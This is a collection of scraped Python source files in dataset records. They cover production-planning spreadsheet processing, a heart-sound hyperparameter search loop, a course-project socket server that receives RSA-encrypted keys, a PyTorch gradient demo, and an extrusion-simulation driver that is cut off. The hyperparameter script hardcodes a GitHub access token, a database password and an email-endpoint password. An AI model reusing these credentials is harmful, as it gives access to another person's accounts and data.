MPP[MPP['Plant'] == 4070]\nMPP = MPP.drop_duplicates(subset=['Machine #'])\nMPP['Machine #'] = MPP['Machine #']\nMPP['SOP Actual'] = pd.to_datetime(MPP['SOP Actual'],errors='ignore')\nMPP = MPP.set_index('Machine #')\n#MPP['Location'][900886]\n\n\nwaterfall = pd.read_excel('Waterfall Input.xlsx')\nColumn_Name = waterfall.loc[5]\nwaterfall = waterfall.iloc[6:,1:]\nfor c in Column_Name[7:13]:\n #print(c)\n waterfall[c] = pd.to_datetime(waterfall[c],format='%Y-%m-%d',errors='ignore')\n #print()\nfor c in Column_Name[13:17]:\n #print(c)\n waterfall[c] = pd.to_datetime(waterfall[c],format='%Y-%m-%d',errors='ignore')\nwaterfall = waterfall.loc[pd.isnull(waterfall['Slot #']) == False]\n# In[2]:\nSMART = pd.read_excel('Smart Factory.xlsx')\nSMART = SMART.drop_duplicates(subset=['Slot #','Module #'])\nSMART['Revised Complete'] = pd.to_datetime(SMART['Revised Complete'],errors='ignore')\nSMART['Actual Complete'] = pd.to_datetime(SMART['Actual Complete'],errors='ignore')\nSMART['Revised Start Build'] = pd.to_datetime(SMART['Revised Start Build'],errors='ignore')\nSMART['Revised Test Start'] = pd.to_datetime(SMART['Revised Test Start'],errors='ignore')\nSMART['Actual Test Start'] = pd.to_datetime(SMART['Actual Test Start'],errors='ignore')\nSMART['Revised Test Complete'] = pd.to_datetime(SMART['Revised Test Complete'],errors='ignore')\nSMART['EOP Plan'] = pd.to_datetime(SMART['EOP Plan'],errors='ignore')\nSMART['EOP Revised'] = pd.to_datetime(SMART['EOP Revised'],errors='ignore')\n# In[3]:\n\nDATA = {\n 'WF Slot #':[],'Slot #':[],'WF Module':[],'Module':[],'WF Hol,Wkd,Revised Start':[],'Hol,Wkd,Revised Start':[],\n 'WF Planned Build Start':[],'Planned Build Start':[],'WF Planned Test Start':[],'Planned Test Start':[],\n 'WF Comp Date Revised EOP':[],'Comp Date Revised EOP':[],'WF Planned EOP':[],'Planned EOP':[]}\nfor index,item in SMART.iterrows():\n if pd.isnull(item['Planned Start Build']):\n continue\n if 'WR' in item['Module #']:\n a = 'Std '\n else:\n a = 'NPI '\n if 'INTC' in item['Module #'] or 'CLNR' in item['Module #'] or 'Cleaner' in item['Product Name'] or 'CLEANER' in item['Product Name']:\n b = 'Clnr'\n else:\n b = 'Pol'\n module = a + b\n pbs2 = item['Planned Start Build']\n if pd.isnull(item['Actual Start Build']) and pd.isnull(item['Revised Start Build']):\n rbs2 = item['Planned Start Build']\n elif pd.isnull(item['Actual Start Build']) == False:\n rbs2 = item['Actual Start Build']\n else:\n rbs2 = item['Revised Start Build']\n if pd.isnull(item['Actual Test Start']) == False:\n pts2 = item['Actual Test Start']\n elif pd.isnull(item['Revised Test Start']) == False:\n pts2 = item['Revised Test Start']\n else:\n pts2 = None\n pEOP2 = item['EOP Plan']\n rEOP2 = item['EOP Revised']\n if item['Slot #'] not in list(waterfall['Slot #']):\n rbs1,pbs1,pts1,rEOP1,pEOP1 = None,None,None,None,None\n #print(item['Slot #'])\n DATA['WF Slot #'].append(None)\n DATA['WF Module'].append(None)\n DATA['WF Hol,Wkd,Revised Start'].append(rbs1)\n DATA['WF Planned Build Start'].append(pbs1)\n DATA['WF Comp Date Revised EOP'].append(rEOP1)\n DATA['WF Planned EOP'].append(pEOP1)\n DATA['Slot #'].append(item['Slot #'])\n DATA['Module'].append(module)\n DATA['Hol,Wkd,Revised Start'].append(rbs2)\n DATA['Planned Build Start'].append(pbs2)\n DATA['Comp Date Revised EOP'].append(rEOP2)\n DATA['Planned EOP'].append(pEOP2)\n DATA['WF Planned Test Start'].append(pts1)\n DATA['Planned Test Start'].append(pts2)\n Append = False\n for IDX,IT in waterfall.iterrows():\n if IT['Slot #'] == item['Slot #']:\n slotN = IT['Slot #']\n moduleN = IT['Module']\n rbs1,pbs1,pts1,rEOP1,pEOP1 = IT['Hol,Wkd,Revised Start'],IT['Planned Build Start'],IT['Planned Test Start'],IT['Comp Date Revised EOP'],IT['Planned EOP']\n if pd.isnull(item['Revised Test Complete']):\n if pd.isnull(pts2):\n if rbs1 != rbs2 or pbs1 != pbs2:\n Append = True\n else:\n if rbs1 != rbs2 or pbs1 != pbs2 or pts1 != pts2:\n Append = True\n else:\n if rbs1 != rbs2 or pbs1 != pbs2 or pts1 != pts2 or rEOP1 != rEOP2 or pEOP1 != pEOP2:\n Append = True\n if Append == True:\n DATA['WF Slot #'].append(slotN)\n DATA['WF Module'].append(moduleN)\n DATA['WF Hol,Wkd,Revised Start'].append(rbs1)\n DATA['WF Planned Build Start'].append(pbs1)\n DATA['WF Comp Date Revised EOP'].append(rEOP1)\n DATA['WF Planned EOP'].append(pEOP1)\n DATA['Slot #'].append(item['Slot #'])\n DATA['Module'].append(module)\n DATA['Hol,Wkd,Revised Start'].append(rbs2)\n DATA['Planned Build Start'].append(pbs2)\n DATA['Comp Date Revised EOP'].append(rEOP2)\n DATA['Planned EOP'].append(pEOP2)\n DATA['WF Planned Test Start'].append(pts1)\n DATA['Planned Test Start'].append(pts2) \n# In[4]:\ndf = pd.DataFrame.from_dict(DATA)\nfor key in ['WF Hol,Wkd,Revised Start','Hol,Wkd,Revised Start','WF Planned Build Start','Planned Build Start','WF Planned Test Start','Planned Test Start',\n 'WF Comp Date Revised EOP','Comp Date Revised EOP','WF Planned EOP','Planned EOP']:\n df[key] = pd.to_datetime(df[key],errors='ignore')\n\n# In[5]:\n\nfor IDX,IT in df.iterrows():\n rbs1,pbs1,pts1,rEOP1,pEOP1 = IT['WF Hol,Wkd,Revised Start'],IT['WF Planned Build Start'],IT['WF Planned Test Start'],IT['WF Comp Date Revised EOP'],IT['WF Planned EOP']\n rbs2,pbs2,pts2,rEOP2,pEOP2 = IT['Hol,Wkd,Revised Start'],IT['Planned Build Start'],IT['Planned Test Start'],IT['Comp Date Revised EOP'],IT['Planned EOP']\n if rbs1 == rbs2 and pbs1 == pbs2 and pts1 == pts2 and rEOP1 == rEOP2 and pEOP1 == pEOP2:\n print(True)\n df.drop(IDX)\n\n# In[6]:\ndf.to_csv('Progress_Revised.csv')\n\n\n\n","repo_name":"Lillianyyding/Production-Planning","sub_path":"Read_Progress.py","file_name":"Read_Progress.py","file_ext":"py","file_size_in_byte":6511,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"10130764927","text":"import os\nos.system(\"pip install loguru==0.5.3\")\nos.system(\"pip install pandas==1.3.5\")\nos.system(\"pip install psycopg2-binary==2.9.1\")\nos.system(\"pip install sqlalchemy-cockroachdb==1.4.3\")\nimport glob\nimport uuid\nfrom loguru import logger\nimport os\nfrom sqlalchemy import create_engine, text, update\nimport pandas as pd\nimport sys\nimport logging\nimport json\nimport pprint\nimport urllib.request\nimport urllib.parse\n\nlogging.basicConfig()\nlogging.getLogger('sqlalchemy.engine').setLevel(logging.INFO)\nPATIENCE_DAYS = 2\ngithub_token = \"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\"\n\ndef update_timestamp(timestamp, parameter_id):\n with engine.connect() as conn:\n if timestamp == None:\n sql_update_timestamp = \"UPDATE parameters_search SET start_running_timestamp = NULL WHERE parameter_id = '{}';\".format(parameter_id)\n else:\n sql_update_timestamp = \"UPDATE parameters_search SET start_running_timestamp = '{}' WHERE parameter_id = '{}';\".format(timestamp, parameter_id)\n res = conn.execute(text(sql_update_timestamp))\n logger.info(\"Updating timestamp: {} - {}\".format(res, sql_update_timestamp))\n\n\ndef update_results(murmur_file, outcome_file, mean_murmur, std_murmur, std_outcome, mean_outcome, parameter_id):\n with engine.connect() as conn:\n sql_update_timestamp = \"UPDATE parameters_search SET murmur_file = '{}', outcome_file = '{}', mean_murmur = '{}', std_murmur='{}', std_outcome='{}', mean_outcome='{}' WHERE parameter_id = '{}';\".format(murmur_file, outcome_file, mean_murmur, std_murmur, std_outcome, mean_outcome, parameter_id)\n res = conn.execute(text(sql_update_timestamp))\n logger.info(\"Updating timestamp: {}\".format(res))\n\n\nos.system(\"curl --create-dirs -o $HOME/.postgresql/root.crt -O https://cockroachlabs.cloud/clusters/6cadd36b-9892-418c-88c7-64a5781755ec/cert\")\n\ndir_path = os.getcwd()\n\ntry:\n os.system(\"apt install -y vim\")\n os.system(\"apt install -y htop\")\n os.system(\"apt install -y libsndfile1\")\n os.system(\"apt install -y unzip\")\nexcept:\n logger.warning(\"You need these libs installed.\")\n\n\nwhile True:\n logger.info(\"Get parameter to run.\")\n os.environ['DATABASE_URL'] = \"cockroachdb://ohh:nZ-eJfpX1fro6l-b9szvCg@free-tier11.gcp-us-east1.cockroachlabs.cloud:26257/defaultdb?sslmode=verify-full&options=--cluster%3Damped-fox-1436\"\n os.environ['DATABASE_URL_PSY'] = \"postgresql://ohh:nZ-eJfpX1fro6l-b9szvCg@free-tier11.gcp-us-east1.cockroachlabs.cloud:26257/defaultdb?sslmode=verify-full&options=--cluster%3Damped-fox-1436\"\n engine = create_engine(os.environ[\"DATABASE_URL\"])\n conn = engine.connect()\n db_df = pd.read_sql(\"SELECT * FROM parameters_search\", con = conn)\n if db_df[pd.isnull(db_df[\"murmur_file\"])].shape[0] == 0:\n logger.info(\"No parameters to run.\")\n sys.exit(0)\n\n current_timestamp = str(pd.Timestamp.now())\n\n logger.info(\"Check if pending running\")\n rows_to_fix = db_df[((pd.Timestamp.now() - pd.to_datetime(db_df[\"start_running_timestamp\"])).dt.days >= PATIENCE_DAYS) & (pd.isnull(db_df[\"mean_murmur\"]))]\n if rows_to_fix.shape[0] > 0:\n logger.info(\"Fix processes without result for more than 48h\")\n for row_id, row in rows_to_fix.iterrows():\n update_timestamp(None, row.parameter_id)\n logger.success(\"Fixing parameters: {}\".format(row.parameter_id))\n db_df = pd.read_sql(\"SELECT * FROM parameters_search\", con = conn)\n\n logger.info(\"Sampling a parameter\")\n parameter_run = db_df.sample().iloc[0]\n logger.info(\"Update timestamp running\")\n db_df.loc[parameter_run.name] = parameter_run\n update_timestamp(current_timestamp, parameter_run.parameter_id)\n\n \n #Cleaning from previous run \n os.system(\"rm -r ./cross-validation-data-1-0-3/\")\n os.system(\"rm -r ./circor-heart-sound/\")\n os.system(\"rm -r ./physionet22/\")\n os.system(\"rm ./murmur_final_result_current.csv\")\n os.system(\"rm ./outcome_final_result_current.csv\")\n \n\n os.system(\"mkdir -p ./cross-validation-data-1-0-3/\")\n os.system(\"mkdir -p ./circor-heart-sound/1.0.3/\")\n os.system(\"git clone --branch matheus https://matheus:{}@github.com/maraujo/physionet22.git\".format(github_token))\n assert os.system(\"pip install -r ./physionet22/requirements.txt\") == 0\n assert os.system(\"pip install tensorflow==2.8.2\") == 0\n\n os.system(\"rm the-circor-digiscope-phonocardiogram-dataset-1.0.3.zip\")\n assert os.system(\"wget https://physionet.org/static/published-projects/circor-heart-sound/the-circor-digiscope-phonocardiogram-dataset-1.0.3.zip\") == 0\n assert os.system(\"unzip -q -o the-circor-digiscope-phonocardiogram-dataset-1.0.3.zip\") == 0\n assert os.system(\"mv ./the-circor-digiscope-phonocardiogram-dataset-1.0.3/training_data ./circor-heart-sound/1.0.3/\") == 0\n\n os.chdir('physionet22/')\n os.system(\"python generate_crossvalidation_splits.py\")\n os.system(\"rm ../the-circor-digiscope-phonocardiogram-dataset-1.0.3.zip\")\n os.system(\"rm -rf ../the-circor-digiscope-phonocardiogram-dataset-1.0.3\")\n os.system(\"rm -rf ../circor-heart-sound\")\n os.system(\"rm -rf ../hyperparameters*\")\n os.system(\"rm -rf ../threshold_*\")\n\n logger.info(\"Saving ohh.config with the following parameters: \\n{}\".format(pprint.pformat(parameter_run.to_dict())))\n with open(\"ohh.config\", \"w\") as ohh_config_fpr:\n json.dump(parameter_run.to_dict(), ohh_config_fpr) \n\n assert os.system(\"python ./test_code_crossvalidation_splits.py\") == 0\n\n murmur_df = pd.read_csv(\"../murmur_final_result_current.csv\")\n outcome_df = pd.read_csv(\"../outcome_final_result_current.csv\")\n murmur_mean = murmur_df['Weighted Accuracy'].mean()\n murmur_std = murmur_df['Weighted Accuracy'].std()\n outcome_mean = outcome_df['Cost'].mean()\n outcome_std = outcome_df['Cost'].std()\n update_results(json.dumps(murmur_df.to_dict()), json.dumps(outcome_df.to_dict()), murmur_mean, murmur_std, outcome_std, outcome_mean, parameter_run.parameter_id)\n\n text_result = \"\"\n text_result += urllib.parse.quote(open(\"ohh.config\").read() + \"\\n\")\n text_result += urllib.parse.quote(open(\"../murmur_final_result_current.csv\").read() + \"\\n\")\n text_result += urllib.parse.quote(open(\"../outcome_final_result_current.csv\").read() + \"\\n\")\n urllib.request.urlopen(\"https://vorkqcranza3s6f66wloniatvy0duufg.lambda-url.us-east-1.on.aws/?destiny=matheus.ld.araujo@gmail.com&text={}&password=FIYl4lXi6QHMJHth&subject=DoneLambda\".format(text_result))\n os.chdir(dir_path)\n","repo_name":"maraujo/physionet22","sub_path":"run_hyperparameters_search.py","file_name":"run_hyperparameters_search.py","file_ext":"py","file_size_in_byte":6499,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"71494389635","text":"import socket\nimport pickle\nfrom cryptography.hazmat.primitives import hashes\nfrom cryptography.hazmat.primitives.asymmetric import rsa, padding\nfrom cryptography.hazmat.primitives.serialization import Encoding, PublicFormat\n\nHOST = \"10.0.0.4\"\nPORT = 10100\n\ndef __generate_private_key() -> rsa.RSAPrivateKey:\n private_key = rsa.generate_private_key(\n public_exponent=65537,\n key_size=2048,\n )\n return private_key\n \n\ndef __get_public_key(private_key: rsa.RSAPrivateKey) -> bytes:\n return private_key.public_key() \\\n .public_bytes(Encoding.PEM, PublicFormat.SubjectPublicKeyInfo)\n\n\ndef send_public_key(conn: socket) -> rsa.RSAPrivateKey:\n private_key = __generate_private_key()\n public_key = __get_public_key(private_key)\n\n conn.send(pickle.dumps(public_key)) \n \n return private_key\n\n\ndef get_filename(conn: socket) -> str:\n filename_bytes = conn.recv(1024)\n filename = filename_bytes.decode()\n conn.send(b\"ACK\")\n return filename\n\n\ndef __decode_line(line: bytes, private_key: rsa.RSAPrivateKey) -> bytes:\n decrypted = private_key.decrypt(\n line,\n padding.OAEP(\n mgf=padding.MGF1(algorithm=hashes.SHA256()),\n algorithm=hashes.SHA256(),\n label=None\n )\n )\n return decrypted\n\n\ndef receive_master_key(filename: str, private_key: rsa.RSAPrivateKey, conn: socket) -> None:\n file_path = f\"/home/test/ftp/{filename}-master.keys\"\n try:\n while True:\n key = conn.recv(4096)\n line = pickle.loads(key)\n if not line or line == \"END\":\n break\n with open(file_path, \"wb\") as file:\n file.write(__decode_line(line, private_key))\n conn.send(b\"ACK\")\n except Exception as e:\n print(e)\n \n\nwith socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:\n s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\n s.bind((HOST, PORT))\n s.listen()\n while True:\n conn, addr = s.accept()\n with conn:\n while True:\n message = conn.recv(8)\n if not message:\n break\n if message == b\"INIT\":\n private_key = send_public_key(conn)\n elif message == b\"FNAM\":\n filename = get_filename(conn)\n elif message == b\"MKEY\":\n receive_master_key(filename, private_key, conn)\n ","repo_name":"vadrif-draco/CSE451-CompAndNetSec-Project","sub_path":"client_server_comm/server_client.py","file_name":"server_client.py","file_ext":"py","file_size_in_byte":2479,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"2018948815","text":"from numpy import gradient, transpose\nimport torch\n\n\"\"\"\n For Task 4.1\n\"\"\"\n\n# Input data\nx = torch.tensor([[7, 8, 9], [10, 11, 12]],\n dtype=torch.float32,\n requires_grad=True)\n\n# Standard linear layer\nlinear_torch = torch.nn.Linear(in_features=3,\n out_features=2,\n bias=False)\n\n# Manually set the weights in the layer\nw = torch.tensor([[1, 2, 3], [4, 5, 6]],\n dtype=torch.float32, requires_grad=True)\n\nlinear_torch.weight = torch.nn.Parameter(w)\n\n# Calculate ouput\ny = linear_torch.forward(x)\n\nprint(f\"x: {x}\")\nprint(f\"output y: {y}\\n\")\n\n# Loss from left outside\ngrad_y = torch.tensor([[1, 2], [2, 3]],\n dtype=torch.float32)\ny.backward(grad_y)\n\n\nprint(f\"grad y: {grad_y}\")\n# print(f\"grad y_t: {grad_y_t}\\n\")\n\n# Calculate gradient for x\ngrad_x = grad_y.matmul(w)\n\n# Calculate gradient for x\ngrad_w = linear_torch.weight.grad\n\nprint(f\"grad x: {grad_x}\")\nprint(f\"grad w: {grad_w}\")","repo_name":"WalterEren/efficient_machine_learning","sub_path":"4th_chapter/4_1_task/linear_layer.py","file_name":"linear_layer.py","file_ext":"py","file_size_in_byte":1009,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"12199716428","text":"#!/usr/bin/env python\n# vim: set filetype=python\n\"\"\"\nThis module is the driver for the e3d simulator\n\n\"\"\"\n\nimport os\nimport sys\nimport re\nimport getopt\nimport shutil\nimport subprocess\nimport math\nimport partitioner\nimport fileinput\nimport datetime\nimport configparser\nfrom watchdog.observers import Observer\nfrom watchdog.observers.polling import PollingObserver \nfrom watchdog.events import FileSystemEventHandler\n\nif sys.version_info[0] < 3:\n from pathlib2 import Path\nelse:\n from pathlib import Path\n\ndebugNoSim = False\ndebugOutput = False\n\nclass E3dLog:\n def __init__(self):\n# print(\"The E3dLog constructor\")\n self.fileName = \"e3d.log\"\n self.fileHandle = \"\"\n self.currPos = 0\n self.statusLineLength = 0\n self.statusLinePos = 0\n self.fileContents = []\n\n def __def__(self):\n #print(\"The E3dLog deconstructor\")\n self.fileHandle.close()\n\n def openFileHandle(self):\n self.fileHandle = open(self.fileName, \"w\")\n\n def closeFileHandle(self):\n self.fileHandle.close()\n\n def appendLine(self, msg):\n with open(self.fileName, \"a\") as f:\n f.write(msg + \"\\n\")\n\n def writeNumAnglePositions(self, numAngPos):\n self.fileHandle.write(\"NumOfAnglePositions=%i\\n\" %numAngPos) \n self.fileHandle.write(\"Periodicity=%i\\n\" %paramDict['periodicity']) \n self.currPos = self.fileHandle.tell()\n self.fileHandle.flush()\n\n def writeGeneralInfo(self, parameterDict):\n\n projectFolder = parameterDict['projectFolder'] \n workingDir = Path('.')\n projectPath = Path(workingDir / projectFolder)\n projectFile = Path(projectPath / 'setup.e3d')\n\n self.fileHandle.write(\"[Extrud3DFileInfo]\\n\")\n self.fileHandle.write(\"FileType=Logging\\n\")\n self.fileHandle.write(\"FileVersion=Extrud3D 2022\\n\")\n today = datetime.date.today()\n self.fileHandle.write(\"Date=%s \\n\" % today.strftime(\"%d/%m/%Y\"))\n self.fileHandle.write(\"Extrud3DVersion=Extrud3D 2022.01\\n\")\n self.fileHandle.write(\"[SimulationStatus]\\n\")\n tempValue = \"\"\n if paramDict[\"temperature\"]:\n tempValue = \"true\"\n else:\n tempValue = \"false\" \n self.fileHandle.write(\"PathToE3DFile=%s\\n\" %str(projectFile))\n self.fileHandle.write(\"TemperatureCalculation=%s\\n\" %tempValue) \n self.fileHandle.write(\"NumOfCpus=%i\\n\" %parameterDict['numProcessors'])\n self.fileHandle.write(\"StartingTime=\" + str(datetime.datetime.now()) + \"\\n\")\n self.fileHandle.flush()\n\n self.currPos = self.fileHandle.tell()\n\n def updateStatusLine(self, msg):\n\n with open(self.fileName, \"r\") as f:\n self.fileContents = f.readlines()\n\n self.fileContents = self.fileContents[:-1] \n with open(self.fileName, \"w\") as f:\n for line in self.fileContents:\n f.write(line)\n\n f.write(msg)\n\n def updateStatusLineInnerIteration(self, msg):\n\n with open(self.fileName, \"r\") as f:\n self.fileContents = f.readlines()\n\n self.fileContents = self.fileContents[:-3] \n\n with open(self.fileName, \"w\") as f:\n for line in self.fileContents:\n f.write(line)\n\n f.write(msg)\n \n\n def updateStatusLineIteration(self, msg, itCurr):\n\n with open(self.fileName, \"r\") as f:\n self.fileContents = f.readlines()\n\n if itCurr == 0:\n self.fileContents = self.fileContents[:-1] \n else:\n self.fileContents = self.fileContents[:-5] \n \n with open(self.fileName, \"w\") as f:\n for line in self.fileContents:\n f.write(line)\n\n f.write(msg)\n \n\n def updateStatusLineHeatIteration(self, msg, numLines=3):\n\n with open(self.fileName, \"r\") as f:\n self.fileContents = f.readlines()\n\n self.fileContents = self.fileContents[:-3] \n with open(self.fileName, \"w\") as f:\n for line in self.fileContents:\n f.write(line)\n\n f.write(msg)\n\n def writeStatusHeat(self, msg):\n\n with open(self.fileName, \"r\") as f:\n self.fileContents = f.readlines()\n\n self.fileContents = self.fileContents[:-1] \n with open(self.fileName, \"w\") as f:\n for line in self.fileContents:\n f.write(line)\n\n f.write(msg)\n\n def popLinesAndWrite(self, numLines, msg):\n\n with open(self.fileName, \"r\") as f:\n self.fileContents = f.readlines()\n\n self.fileContents = self.fileContents[:-numLines] \n with open(self.fileName, \"w\") as f:\n for line in self.fileContents:\n f.write(line)\n\n f.write(msg)\n\n\n def popLinesBack(self, numLines):\n\n with open(self.fileName, \"r\") as f:\n self.fileContents = f.readlines()\n\n self.fileContents = self.fileContents[:-numLines] \n with open(self.fileName, \"w\") as f:\n for line in self.fileContents:\n f.write(line)\n\n f.write(msg)\n\n def writeExitMsg(self):\n with open(self.fileName, \"r\") as f:\n self.fileContents = f.readlines()\n\n\n self.fileContents = self.fileContents[:-1] \n with open(self.fileName, \"w\") as f:\n for line in self.fileContents:\n f.write(line)\n\n f.write(\"CurrentStatus=finished\\n\")\n f.write(\"FinishingTime=\" + str(datetime.datetime.now()) + \"\\n\")\n\n def writeStatusLine(self):\n self.openFileHandle()\n self.fileHandle.write(\"CurrentStatus=running\")\n self.closeFileHandle()\n\n def writeStatusLine2(self):\n self.fileHandle.write(\"CurrentStatus=running\")\n self.currPos = self.fileHandle.tell()\n\n def logErrorExit(self, message, errorCode):\n with open(self.fileName, \"r\") as f:\n self.fileContents = f.readlines()\n\n self.fileContents = self.fileContents[:-1] \n with open(self.fileName, \"w\") as f:\n for line in self.fileContents:\n f.write(line)\n\n f.write(message + \"\\n\")\n f.write(\"ErrorCode=%i\\n\" % errorCode)\n f.write(\"FinishingTime=\" + str(datetime.datetime.now()) + \"\\n\")\n sys.exit(errorCode) \n\nmyLog = E3dLog()\n\nparamDict = {\n \"deltaAngle\": 10.0, # Angular step size\n \"singleAngle\": -10.0, # Single angle to compute \n \"hostFile\" : \"\", # Hostfile\n \"rankFile\" : \"\" , # Rankfile \n \"timeLevels\" : 36, # timeLevels\n \"periodicity\" : 1, # Periodicity \n \"numProcessors\" : 0, # Number of processors \n \"projectFolder\" : \"\", # The project folder\n \"skipSetup\" : False,\n \"shortTest\" : False, \n \"skipSimulation\" : False,\n \"hasDeltaAngle\": False,\n \"hasTimeLevels\": False,\n \"useSrun\": False,\n \"meshReduction\": False,\n \"dieSimulation\": False,\n \"temperature\" : False,\n \"partialFilling\" : False,\n \"onlyMeshCreation\" : False,\n \"retryDeformation\" : False\n}\n\nclass ProtocolObserver(FileSystemEventHandler):\n def on_created(self, event):\n fileBaseName = os.path.basename(event.src_path)\n\n def on_modified(self, event):\n fileBaseName = os.path.basename(event.src_path)\n patternFound = False\n if fileBaseName == \"prot.txt\":\n pattern = \"itns:\\s*([0-9]+)[/]\\s*([0-9]+)\"\n with open(event.src_path, \"r\") as f:\n fileContents = f.readlines()\n for line in reversed(fileContents):\n matchObj = re.search(pattern, line)\n if matchObj: \n patternFound = True\n statusMsg = \"CurrentInnerIteration=%i\\n\"\\\n \"MaxInnerIteration=%i\\n\"\\\n \"CurrentStatus=running Momentum Solver\" %(int(matchObj.group(1)), int(matchObj.group(2)))\n myLog.updateStatusLineInnerIteration(statusMsg)\n break\n#===============================================================================\n\n\n#===============================================================================\n# version function\n#===============================================================================\ndef version():\n \"\"\"\n Print out version information\n \"\"\"\n print(\"E3D + Reporter for SIGMA Version 2020.11.5, Copyright 2019 IANUS Simulation\")\n#===============================================================================\n\n\n#===============================================================================\n# usage function\n#===============================================================================\ndef usage():\n \"\"\"\n Print out usage information\n \"\"\"\n print(\"Usage: python e3d_start.py [options]\")\n print(\"Where options can be:\")\n print(\"[-f', '--project-folder]: Path to project folder containing a setup.e3d file\")\n print(\"[-n', '--num-processors]: Number of processors to use\")\n print(\"[-p', '--periodicity']: Periodicity of the solution (1, 2, 3, ... \" +\n \"usually the time flight number)\")\n print(\"[-a', '--angle]: If this parameter is present a single simulation with \" +\n \"that specific angle will be done.\")\n print(\"[-d', '--delta-angle]: The angular step size between two simulations \" +\n \"the sim loop (default 10)\")\n print(\"[-c', '--host-conf]: A hostfile as input for the mpirun command\")\n print(\"[-r', '--rank-file]: A rankfile as input for the mpirun command\")\n print(\"[-t', '--time]: Number of time levels to complete a full 360 rotation\")\n print(\"['-o', '--do-temperature']: The simulation loop will do a temperature simulation\")\n print(\"[-h', '--help']: prints this message\")\n print(\"[-v', '--version']: prints out version information\")\n print(\"[-x', '--short-test']: configures the program for a short test\")\n print(\"[-u', '--use-srun']: Uses the srun launch mechanism\")\n print(\"['--die-simulation']: fires up a single angle DIE sim with the corresponding datafile\")\n print(\"['--mesh-reduction']: Deforms and reduces the mesh file\")\n print(\"Example: python ./e3d_start.py -f myFolder -n 5 -t 0\")\n#===============================================================================\n\n\n#===============================================================================\n# custom mkdir\n#===============================================================================\ndef mkdir(dir):\n if os.path.exists(dir):\n if os.path.isdir(dir):\n return\n else:\n os.remove(dir)\n os.mkdir(dir)\n#===============================================================================\n\n\n#===============================================================================\n# simple file in-situ replacement method\n#===============================================================================\ndef replace_in_file(file_path, search_text, new_text):\n with fileinput.input(file_path, inplace=True) as f:\n for line in f:\n new_line = line.replace(search_text, new_text)\n print(new_line, end='')\n#===============================================================================\n\n\n#===============================================================================\n# Parse MaxNumStep from q2p1_param.dat\n#===============================================================================\ndef parseMaxNumSteps(file_path):\n maxIters = 300\n pattern = re.compile(r\"SimPar@MaxNumStep\\s+[=]\\s+([0-9]+)\")\n for line in open(file_path):\n for match in re.finditer(pattern, line):\n maxIters = int(match.group(1))\n return maxIters\n\n return maxIters\n#===============================================================================\n\n\n#===============================================================================\n# e3dToDict \n#===============================================================================\ndef e3dToDict(pathName):\n config = configparser.ConfigParser()\n config.read(pathName)\n\n if not pathName.exists():\n raise FileNotFoundError(\"File {0} was not found.\".format(pathName))\n\n return config\n#===============================================================================\n\n\n#===============================================================================\n# setup the case folder \n#===============================================================================\ndef folderSetup(workingDir, projectFile, projectPath, projectFolder):\n if not projectFile.is_file():\n projectFile = Path(projectPath / 'Extrud3D.dat')\n if not projectFile.is_file():\n print(\"Could not find a valid parameter file in the project folder: \" +\n str(projectPath))\n sys.exit(2)\n\n if paramDict['shortTest']:\n if (paramDict['dieSimulation']) :\n backupDataFile = Path(\"_data_BU\") / Path(\"q2p1_paramV_DIE_test.dat\")\n elif (paramDict['partialFilling']) :\n backupDataFile = Path(\"_data_PF\") / Path(\"q2p1_paramV_0_test.dat\")\n elif (paramDict['meshReduction']) :\n backupDataFile = Path(\"_data_BU\") / Path(\"q2p1_paramV_MESH.dat\")\n else:\n backupDataFile = Path(\"_data_BU\") / Path(\"q2p1_paramV_BU_test.dat\")\n else:\n if (paramDict['dieSimulation']) :\n backupDataFile = Path(\"_data_BU\") / Path(\"q2p1_paramV_DIE.dat\")\n elif (paramDict['partialFilling']) :\n backupDataFile = Path(\"_data_PF\") / Path(\"q2p1_paramV_0.dat\")\n elif (paramDict['meshReduction']) :\n backupDataFile = Path(\"_data_BU\") / Path(\"q2p1_paramV_MESH.dat\")\n else:\n backupDataFile = Path(\"_data_BU\") / Path(\"q2p1_paramV_BU.dat\")\n \n# backupDataFile = Path(\"_data_BU\") / Path(\"q2p1_paramV_BU.dat\")\n destDataFile = Path(\"_data\") / Path(\"q2p1_param.dat\")\n\n shutil.copyfile(str(backupDataFile), str(destDataFile))\n shutil.copyfile(str(projectFile), str(workingDir / Path(\"_data/Extrud3D_0.dat\")))\n\n offList = []\n if not sys.platform == \"win32\":\n offList = list(Path(projectFolder).glob('*.off')) + list(Path(projectFolder).glob('*.OFF'))\n else: \n offList = list(Path(projectFolder).glob('*.off'))\n\n for item in offList:\n shutil.copyfile(str(item), str(workingDir / item.name))\n\n if Path(\"_data/meshDir\").exists():\n print(\"meshDir exists\")\n shutil.rmtree(\"_data/meshDir\")\n#===============================================================================\n\n#===============================================================================\n# Mesher Step \n#===============================================================================\ndef mesherStep(workingDir, projectFile, projectPath, projectFolder):\n\n myLog.updateStatusLine(\"CurrentStatus=running Mesher\")\n\n if sys.platform == \"win32\":\n exitCode = subprocess.call([\"./s3d_mesher\"]) \n else:\n exitCode = subprocess.call([\"./s3d_mesher\"], shell=True)\n\n\n if exitCode != 0:\n myLog.logErrorExit(\"CurrentStatus=abnormal Termination Mesher\", exitCode)\n\n if not Path(\"_data/meshDir\").exists():\n meshDirPath = projectPath / Path(\"meshDir\")\n if meshDirPath.exists():\n print('Copying meshDir from Project Folder!')\n shutil.copytree(str(meshDirPath), \"_data/meshDir\")\n else:\n print(\"Error: No mesh automatically generated and no \" + \n \"folder present the case folder \" + str(projectPath))\n sys.exit(2)\n \n return exitCode\n#===============================================================================\n\n\n#===============================================================================\n# Partitioner Step \n#===============================================================================\ndef partitionerStep(workingDir, projectFile, projectPath, projectFolder):\n partitionerParameters = [1, 1]\n if paramDict['partialFilling']:\n partitionerParameters = [-3, 2]\n\n print(\"Partitioner parameters: \",-1, partitionerParameters)\n try:\n myLog.updateStatusLine(\"CurrentStatus=running Partitioner\")\n partitioner.partition(paramDict['numProcessors']-1, partitionerParameters[0], partitionerParameters[1], \"NEWFAC\", \"_data/meshDir/file.prj\")\n except:\n myLog.logErrorExit(\"CurrentStatus=abnormal Termination Partitioner\", 2)\n 